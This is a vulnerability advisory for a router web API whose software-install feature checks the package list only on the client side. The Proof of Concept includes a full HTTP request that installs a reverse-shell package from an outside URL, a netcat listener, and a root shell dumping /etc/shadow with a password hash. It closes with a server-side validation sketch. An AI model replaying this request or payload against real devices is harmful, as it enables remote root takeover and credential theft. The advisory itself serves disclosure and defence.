Abuse of Functionality leads to RCE
Through the software installation feature, it is possible to install arbitrary software, such as a reverse shell, because the filter on the available package list is enforced only on the client side. Software can be installed from the filesystem, from the list (as intended by the application logic) and from a URL. In the Proof of Concept, a basic reverse shell connects to 192.168.8.140 on port 8888. The connection can be received with a netcat listener on port 8888. The package is available for your tests.
Proof of Concept:
Request
POST /cgi-bin/api/software/install HTTP/1.1
Host: 192.168.8.1
Content-Length: 66
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Authorization: ce0fc001ff684088a83257360de4bb44
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.8.1
Referer: http://192.168.8.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin-Token=ce0fc001ff684088a83257360de4bb44
Connection: close

name=http://onofri.org/storage/reverse_shell_1.0.0-1_mips_24kc.ipk
On the shell
% nc -l 8888
id
uid=0(root) gid=0(root)
cat /etc/shadow
root:$1$lchqx22V$LOxNwv3ggvnFw/kIyD2eB0:19256:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
stubby:x:0:0:99999:7:::
pwd
/www/cgi-bin
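
The missing control is a server-side check of the `name` parameter before anything reaches the package manager. The sketch below is an added example, not code from this advisory or from the vendor; the allowlist contents, the name pattern and the function name `validate_install_request` are assumptions.

```python
import re
from typing import Tuple
from urllib.parse import parse_qs

# Assumption: the firmware keeps its own list of installable packages.
# These names are constructed sample values, not the vendor's real list.
ALLOWED_PACKAGES = {"luci-app-example", "openvpn-openssl", "tcpdump"}

# Conservative pattern for a bare package name: no scheme, no path separators.
PKG_NAME_RE = re.compile(r"[a-z0-9][a-z0-9+._-]{0,63}")

# Request body taken from the Proof of Concept above.
POC_BODY = "name=http://onofri.org/storage/reverse_shell_1.0.0-1_mips_24kc.ipk"


def validate_install_request(body: str) -> Tuple[bool, str]:
    """Decide on the server whether an install request may proceed.

    Returns (True, package_name) or (False, reason).
    """
    params = parse_qs(body, keep_blank_values=True)
    names = params.get("name", [])
    # Duplicate parameters could make the validator and the installer
    # disagree about which value is used, so require exactly one.
    if len(names) != 1:
        return False, "exactly one 'name' parameter is required"
    name = names[0]
    # Rejects URLs, filesystem paths and traversal sequences in one step.
    if not PKG_NAME_RE.fullmatch(name):
        return False, "not a bare package name"
    # Enforce the same list the client-side filter shows, but on the server.
    if name not in ALLOWED_PACKAGES:
        return False, "package is not in the server-side list"
    return True, name


if __name__ == "__main__":
    for sample in (POC_BODY, "name=/tmp/pkg.ipk", "name=nmap", "name=tcpdump"):
        print(sample, "->", validate_install_request(sample))
```

Only the validated name, never the raw parameter, should then be passed to the installer.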